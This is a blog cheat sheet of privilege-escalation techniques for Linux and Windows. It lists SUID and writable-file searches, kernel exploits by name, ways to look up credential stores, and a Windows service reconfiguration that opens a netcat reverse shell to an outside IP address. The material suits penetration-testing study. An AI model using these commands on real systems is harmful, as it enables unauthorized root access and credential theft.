Information Technology | Softwares - Graphics - Programming - Hacking - Security

Apr 12, 2020

Tips and Cheat Sheet useful for Privilege Escalation


Linux:
Sudo Rights, we can find files as root in the user’s shell with:
$ sudo -l
Get shell: /bin/bash -i
with file as root in user, we can add that line in file then run. We will open the root shell

Find anything with SUID / SGID permission:

$ find / -perm -4000 -ls 2>/dev/null
$ find / -user root -perm -4000 2>/dev/null
$ find / -perm -2000 2>/dev/null

Writeable folders

$ find / -writable -type d 2>/dev/null
$ find / -perm -222 -type d 2>/dev/null
$ find / -perm -o w -type d 2>/dev/null

Find any writable file owned by root:

$ find / -perm -002 -user root -type f -not-path “/proc/*” 2>/dev/null

Identify the kernel version and distribution:

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release
Use "sendpage" and "dirtycow" both kernel exploits to do privilege escalation

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions:

https://gtfobins.github.io

There are some tool to auto find signature can exploitable in victim machine like: LinEnum, Pspy

https://github.com/rebootuser/LinEnum
https://github.com/DominicBreuker/pspy


Windows:


Check services with write access:

> accesschk -a *
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Service exploit E.g:
Reconfig service with exploit command or reverse shell:
> sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe"
Then restart service:
> sc.exe stop <service name>
> sc.exe start <service name>

Permissions on specific folders:

> icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
> icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

Look for backups files SAM.bak.


Check Credentials mananger:

> dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ cmdkey /list
> dir C:\Users\username\AppData\Local\Microsoft\Credentials\

What tokens we have 

> whoami /priv

What we can access?

> whoami /groups

Some useful tool:

https://github.com/Hackplayers/PsCabesha-tools

updating...

Most of PrivEsc way is find signature/version then go to find the way to exploit like CVE or at https://www.exploit-db.com/


READ MORE: 

Windows pentest cheat sheet
Useful Pentest cheat sheet/tools
Share:

About Us